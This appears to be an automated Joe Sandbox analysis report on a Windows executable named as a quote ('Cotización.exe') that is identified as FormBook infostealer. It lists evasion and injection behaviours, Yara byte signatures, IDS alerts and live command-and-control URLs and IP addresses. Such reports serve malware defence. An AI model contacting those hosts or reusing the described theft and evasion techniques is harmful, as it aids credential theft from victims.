Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cotizaci#U00f3n.exe

Overview

General Information

Sample name:Cotizaci#U00f3n.exe
renamed because original name is a hash value
Original sample name:Cotizacin.exe
Analysis ID:1515430
MD5:6a246a44fb8910b98fae3fc6ecdaa411
SHA1:491f62c383b3637603754ddfba5c8a3afe6dffb7
SHA256:34cdc9dbeed25021f6a572352cc75a2c6b4fa6c273b89b55219e83f6c2466992
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Cotizaci#U00f3n.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe" MD5: 6A246A44FB8910B98FAE3FC6ECDAA411)
    • svchost.exe (PID: 3576 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UOIRaMZSIyDCj.exe (PID: 4552 cmdline: "C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5732 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • UOIRaMZSIyDCj.exe (PID: 6316 cmdline: "C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", CommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", ParentImage: C:\Users\user\Desktop\Cotizaci#U00f3n.exe, ParentProcessId: 1988, ParentProcessName: Cotizaci#U00f3n.exe, ProcessCommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", ProcessId: 3576, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", CommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", ParentImage: C:\Users\user\Desktop\Cotizaci#U00f3n.exe, ParentProcessId: 1988, ParentProcessName: Cotizaci#U00f3n.exe, ProcessCommandLine: "C:\Users\user\Desktop\Cotizaci#U00f3n.exe", ProcessId: 3576, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:55:42.580558+020020507451Malware Command and Control Activity Detected192.168.2.114975885.159.66.9380TCP
            2024-09-22T17:56:31.057863+020020507451Malware Command and Control Activity Detected192.168.2.1149713148.72.152.17480TCP
            2024-09-22T17:56:54.983460+020020507451Malware Command and Control Activity Detected192.168.2.11497183.33.130.19080TCP
            2024-09-22T17:57:08.880515+020020507451Malware Command and Control Activity Detected192.168.2.1149722172.191.244.6280TCP
            2024-09-22T17:57:22.792031+020020507451Malware Command and Control Activity Detected192.168.2.1149726172.96.191.3980TCP
            2024-09-22T17:57:36.300756+020020507451Malware Command and Control Activity Detected192.168.2.1149730217.70.184.5080TCP
            2024-09-22T17:57:50.315546+020020507451Malware Command and Control Activity Detected192.168.2.114973463.250.47.4080TCP
            2024-09-22T17:58:03.670027+020020507451Malware Command and Control Activity Detected192.168.2.114973891.184.0.20080TCP
            2024-09-22T17:58:16.891379+020020507451Malware Command and Control Activity Detected192.168.2.114974213.248.169.4880TCP
            2024-09-22T17:58:45.222220+020020507451Malware Command and Control Activity Detected192.168.2.114975043.242.202.16980TCP
            2024-09-22T17:58:59.133280+020020507451Malware Command and Control Activity Detected192.168.2.1149754103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:55:42.580558+020028554651A Network Trojan was detected192.168.2.114975885.159.66.9380TCP
            2024-09-22T17:56:31.057863+020028554651A Network Trojan was detected192.168.2.1149713148.72.152.17480TCP
            2024-09-22T17:56:54.983460+020028554651A Network Trojan was detected192.168.2.11497183.33.130.19080TCP
            2024-09-22T17:57:08.880515+020028554651A Network Trojan was detected192.168.2.1149722172.191.244.6280TCP
            2024-09-22T17:57:22.792031+020028554651A Network Trojan was detected192.168.2.1149726172.96.191.3980TCP
            2024-09-22T17:57:36.300756+020028554651A Network Trojan was detected192.168.2.1149730217.70.184.5080TCP
            2024-09-22T17:57:50.315546+020028554651A Network Trojan was detected192.168.2.114973463.250.47.4080TCP
            2024-09-22T17:58:03.670027+020028554651A Network Trojan was detected192.168.2.114973891.184.0.20080TCP
            2024-09-22T17:58:16.891379+020028554651A Network Trojan was detected192.168.2.114974213.248.169.4880TCP
            2024-09-22T17:58:45.222220+020028554651A Network Trojan was detected192.168.2.114975043.242.202.16980TCP
            2024-09-22T17:58:59.133280+020028554651A Network Trojan was detected192.168.2.1149754103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:56:46.859354+020028554641A Network Trojan was detected192.168.2.11497153.33.130.19080TCP
            2024-09-22T17:56:50.154468+020028554641A Network Trojan was detected192.168.2.11497163.33.130.19080TCP
            2024-09-22T17:56:52.453005+020028554641A Network Trojan was detected192.168.2.11497173.33.130.19080TCP
            2024-09-22T17:57:01.234484+020028554641A Network Trojan was detected192.168.2.1149719172.191.244.6280TCP
            2024-09-22T17:57:03.777150+020028554641A Network Trojan was detected192.168.2.1149720172.191.244.6280TCP
            2024-09-22T17:57:06.378235+020028554641A Network Trojan was detected192.168.2.1149721172.191.244.6280TCP
            2024-09-22T17:57:15.083334+020028554641A Network Trojan was detected192.168.2.1149723172.96.191.3980TCP
            2024-09-22T17:57:17.656021+020028554641A Network Trojan was detected192.168.2.1149724172.96.191.3980TCP
            2024-09-22T17:57:20.198719+020028554641A Network Trojan was detected192.168.2.1149725172.96.191.3980TCP
            2024-09-22T17:57:28.617279+020028554641A Network Trojan was detected192.168.2.1149727217.70.184.5080TCP
            2024-09-22T17:57:31.226921+020028554641A Network Trojan was detected192.168.2.1149728217.70.184.5080TCP
            2024-09-22T17:57:33.725982+020028554641A Network Trojan was detected192.168.2.1149729217.70.184.5080TCP
            2024-09-22T17:57:42.678589+020028554641A Network Trojan was detected192.168.2.114973163.250.47.4080TCP
            2024-09-22T17:57:45.205488+020028554641A Network Trojan was detected192.168.2.114973263.250.47.4080TCP
            2024-09-22T17:57:47.726202+020028554641A Network Trojan was detected192.168.2.114973363.250.47.4080TCP
            2024-09-22T17:57:56.071349+020028554641A Network Trojan was detected192.168.2.114973591.184.0.20080TCP
            2024-09-22T17:57:58.670257+020028554641A Network Trojan was detected192.168.2.114973691.184.0.20080TCP
            2024-09-22T17:58:01.264882+020028554641A Network Trojan was detected192.168.2.114973791.184.0.20080TCP
            2024-09-22T17:58:09.213914+020028554641A Network Trojan was detected192.168.2.114973913.248.169.4880TCP
            2024-09-22T17:58:11.763497+020028554641A Network Trojan was detected192.168.2.114974013.248.169.4880TCP
            2024-09-22T17:58:14.351818+020028554641A Network Trojan was detected192.168.2.114974113.248.169.4880TCP
            2024-09-22T17:58:37.445319+020028554641A Network Trojan was detected192.168.2.114974743.242.202.16980TCP
            2024-09-22T17:58:39.997886+020028554641A Network Trojan was detected192.168.2.114974843.242.202.16980TCP
            2024-09-22T17:58:42.837635+020028554641A Network Trojan was detected192.168.2.114974943.242.202.16980TCP
            2024-09-22T17:58:51.303631+020028554641A Network Trojan was detected192.168.2.1149751103.224.182.24280TCP
            2024-09-22T17:58:54.019288+020028554641A Network Trojan was detected192.168.2.1149752103.224.182.24280TCP
            2024-09-22T17:58:56.516909+020028554641A Network Trojan was detected192.168.2.1149753103.224.182.24280TCP
            2024-09-22T17:59:05.784024+020028554641A Network Trojan was detected192.168.2.114975585.159.66.9380TCP
            2024-09-22T17:59:08.330847+020028554641A Network Trojan was detected192.168.2.114975685.159.66.9380TCP
            2024-09-22T17:59:11.705847+020028554641A Network Trojan was detected192.168.2.114975785.159.66.9380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.omexai.info/7xi5/?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFpAvira URL Cloud: Label: malware
            Source: http://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8=Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/?u2pl=VvmP2xFp&0th4S=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV15vzCfsX7PVMYIeNh7VIWv397Pk5GDHjjKk=Avira URL Cloud: Label: malware
            Source: https://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/Virustotal: Detection: 6%Perma Link
            Source: http://www.tekilla.wtf/fpzw/Virustotal: Detection: 6%Perma Link
            Source: Cotizaci#U00f3n.exeReversingLabs: Detection: 55%
            Source: Cotizaci#U00f3n.exeVirustotal: Detection: 56%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Cotizaci#U00f3n.exeJoe Sandbox ML: detected
            Source: Cotizaci#U00f3n.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UOIRaMZSIyDCj.exe, 00000003.00000002.3763456285.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579370563.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Cotizaci#U00f3n.exe, 00000000.00000003.1315794811.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Cotizaci#U00f3n.exe, 00000000.00000003.1326823393.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1416065692.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1414220526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.000000000379E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1505597228.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.0000000003540000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1508797342.0000000003393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Cotizaci#U00f3n.exe, 00000000.00000003.1315794811.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Cotizaci#U00f3n.exe, 00000000.00000003.1326823393.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1505990325.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1416065692.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1414220526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.000000000379E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1505597228.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.0000000003540000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1508797342.0000000003393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1473841768.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505722622.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000002.3763899139.0000000000F47000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3759956328.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3765472175.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579774617.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001E89C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3759956328.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3765472175.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579774617.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001E89C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1473841768.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505722622.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000002.3763899139.0000000000F47000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BBC2C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02BBC2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02BA9B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_02BC2399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_033E04DE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49753 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49738 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49738 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49751 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49754 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49754 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49723 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49742 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49742 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49733 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49757 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49726 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49756 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49726 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49721 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49724 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49728 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49741 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49734 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49727 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49734 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49719 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49718 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49722 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49718 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49735 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49717 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49713 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49713 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49747 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49729 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49722 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49750 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49748 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49750 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49749 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49725 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49737 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49740 -> 13.248.169.48:80
